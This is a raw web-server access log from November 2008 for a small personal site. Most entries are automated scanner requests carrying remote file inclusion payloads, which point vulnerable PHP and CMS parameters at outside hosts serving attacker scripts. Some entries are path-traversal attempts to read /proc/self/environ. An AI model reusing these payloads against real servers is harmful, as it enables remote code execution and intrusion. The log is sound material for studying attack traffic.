62.141.48.87 - - [03/Nov/2008:05:24:18 -0600] "GET /logs//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:19 -0600] "GET /logs/access_log.1217030400//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:19 -0600] "GET /logs//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:20 -0600] "GET /logs/access_log.1217635200//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:22 -0600] "GET /logs//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:23 -0600] "GET /logs/access_log.1217030400//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:24 -0600] "GET /logs/access_log.1217635200//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:05:24:30 -0600] "GET /logs/access_log.1217635200//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
64.38.4.3 - - [03/Nov/2008:05:25:18 -0600] "GET /index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:05:25:18 -0600] "GET /logs/index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
195.3.194.35 - - [03/Nov/2008:05:27:34 -0600] "GET /logs/access_log.1214524800%20//encapscms_PATH/core/core.php?root=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:27:34 -0600] "GET //encapscms_PATH/core/core.php?root=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:27:34 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
208.38.188.128 - - [03/Nov/2008:05:29:15 -0600] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
208.38.188.128 - - [03/Nov/2008:05:29:15 -0600] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
208.38.188.128 - - [03/Nov/2008:05:29:15 -0600] "GET /modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
208.38.188.128 - - [03/Nov/2008:05:29:15 -0600] "GET /modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
207.139.167.49 - - [03/Nov/2008:05:30:36 -0600] "GET /logs/modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:05:30:36 -0600] "GET /modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
208.38.188.128 - - [03/Nov/2008:05:31:34 -0600] "GET /logs/access_log.1205366400/modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
208.38.188.128 - - [03/Nov/2008:05:31:34 -0600] "GET /modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
208.38.188.128 - - [03/Nov/2008:05:31:35 -0600] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
195.3.194.35 - - [03/Nov/2008:05:32:13 -0600] "GET /logs/access_log.1211587200//encapscms_PATH/core/core.php?root=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:32:22 -0600] "GET /logs/access_log.1214524800//encapscms_PATH/core/core.php?root=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:32:34 -0600] "GET /logs/access_log.1211587200//encapscms_PATH/core/core.php?root=http://bugisku.com/chid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:32:42 -0600] "GET /logs/access_log.1214524800//encapscms_PATH/core/core.php?root=http://bugisku.com/chid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
83.19.144.26 - - [03/Nov/2008:05:33:46 -0600] "GET /logs/access_log.1203724800///errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:05:33:47 -0600] "GET ///errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:05:33:47 -0600] "GET /logs///errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
195.3.194.35 - - [03/Nov/2008:05:34:19 -0600] "GET /logs/access_log.1214524800%20//encapscms_PATH/core/core.php?root=http://bugisku.com/chid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
208.38.188.128 - - [03/Nov/2008:05:35:31 -0600] "GET /logs/access_log.1208044800/modules/xfsection/modify.php?dir_module=http://www.shefaa.org/images/id?? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
124.186.96.33 - - [03/Nov/2008:05:37:07 -0600] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
124.186.96.33 - - [03/Nov/2008:05:37:08 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /logs/db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /logs/db.php?path_local=http://clusty.com/search??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /logs/db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /db.php?path_local=http://clusty.com/search??? HTTP/1.1" 404 290 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 290 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:05:37:17 -0600] "GET /db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""XXXXXX"
210.219.173.249 - - [03/Nov/2008:05:38:01 -0600] "GET /logs/access_log.1208044800/errors.php?error=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.150.183.60 - - [03/Nov/2008:05:38:34 -0600] "GET /logs/errors.php?error=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:05:38:34 -0600] "GET /errors.php?error=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:38:41 -0600] "GET /logs/access_log.1208304000%20//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:38:41 -0600] "GET //?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
124.186.96.33 - - [03/Nov/2008:05:38:43 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
124.186.96.33 - - [03/Nov/2008:05:38:44 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
124.186.96.33 - - [03/Nov/2008:05:38:44 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
89.218.85.18 - - [03/Nov/2008:05:38:46 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
124.186.96.33 - - [03/Nov/2008:05:38:49 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
83.149.69.97 - - [03/Nov/2008:05:39:42 -0600] "GET /logs/access_log.1208304000%20//?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:05:39:42 -0600] "GET //?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:05:39:43 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 200 105506 "-""libwww-perl/5.79"
207.150.183.60 - - [03/Nov/2008:05:40:28 -0600] "GET //?path%5Bdocroot%5D=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:05:40:29 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:05:40:44 -0600] "GET /logs/access_log.1212883200/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:05:40:44 -0600] "GET /errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:05:40:45 -0600] "GET /logs/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:05:40:55 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:05:40:55 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:05:40:56 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:05:40:56 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:41:40 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:05:42:04 -0600] "GET //?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:05:42:04 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:05:42:04 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.800"
67.195.37.172 - - [03/Nov/2008:05:42:32 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.172 - - [03/Nov/2008:05:42:33 -0600] "GET /artwork/ HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.150.183.60 - - [03/Nov/2008:05:46:04 -0600] "GET /logs/errors.php?error=http://reload.go.ro/rfi/idit.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:05:46:05 -0600] "GET /errors.php?error=http://reload.go.ro/rfi/idit.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.124.127.40 - - [03/Nov/2008:05:46:18 -0600] "GET /logs/access_log.1203724800//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
121.124.127.40 - - [03/Nov/2008:05:46:19 -0600] "GET //errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
121.124.127.40 - - [03/Nov/2008:05:46:19 -0600] "GET /logs//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
66.40.52.30 - - [03/Nov/2008:05:47:39 -0600] "GET /logs/access_log.1208304000%20//?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.800"
83.19.144.26 - - [03/Nov/2008:05:48:14 -0600] "GET /logs/access_log.1203724800//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:05:48:15 -0600] "GET //errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:05:48:16 -0600] "GET /logs//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
59.182.18.21 - - [03/Nov/2008:05:48:34 -0600] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:34 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:37 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:40 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:41 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:42 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:43 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
59.182.18.21 - - [03/Nov/2008:05:48:55 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
190.5.195.145 - - [03/Nov/2008:05:53:34 -0600] "GET /logs/modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:05:53:34 -0600] "GET /modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
70.85.114.130 - - [03/Nov/2008:05:53:55 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:05:53:55 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:05:53:56 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
121.124.127.40 - - [03/Nov/2008:05:58:52 -0600] "GET /logs/access_log.1206230400//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
83.19.144.26 - - [03/Nov/2008:05:59:21 -0600] "GET /logs/access_log.1206230400//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
206.225.91.21 - - [03/Nov/2008:06:03:10 -0600] "GET /logs//authentication/smf/smf.functions.php?Config_auth[smf_path]=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
206.225.91.21 - - [03/Nov/2008:06:03:10 -0600] "GET //authentication/smf/smf.functions.php?Config_auth[smf_path]=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:03:33 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:03:33 -0600] "GET //?path%5Bdocroot%5D=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:03:34 -0600] "GET /logs//?path%5Bdocroot%5D=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 200 105506 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:03:45 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.3.194.35 - - [03/Nov/2008:06:03:54 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:06:03:54 -0600] "GET //?path%5Bdocroot%5D=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:06:03:55 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:06:04:47 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:06:04:47 -0600] "GET //?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
62.87.154.41 - - [03/Nov/2008:06:04:50 -0600] "GET /logs//naboard_pnr.php?skin=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:06:04:50 -0600] "GET //naboard_pnr.php?skin=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
195.3.194.35 - - [03/Nov/2008:06:04:51 -0600] "GET /logs//?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
66.197.201.69 - - [03/Nov/2008:06:07:17 -0600] "GET /logs/access_log.1203638400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:07:17 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:07:17 -0600] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:07:17 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.40.52.30 - - [03/Nov/2008:06:08:07 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:08:08 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
195.239.48.166 - - [03/Nov/2008:06:10:16 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:16 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:17 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:17 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:19 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:19 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:20 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:10:20 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
206.225.91.21 - - [03/Nov/2008:06:10:53 -0600] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
206.225.91.21 - - [03/Nov/2008:06:10:53 -0600] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.7.219.93 - - [03/Nov/2008:06:12:05 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
74.7.219.93 - - [03/Nov/2008:06:12:06 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
66.40.52.30 - - [03/Nov/2008:06:13:31 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:13:31 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:13:34 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:13:34 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
89.218.85.18 - - [03/Nov/2008:06:15:44 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:15:45 -0600] "GET //db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:15:46 -0600] "GET /logs//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
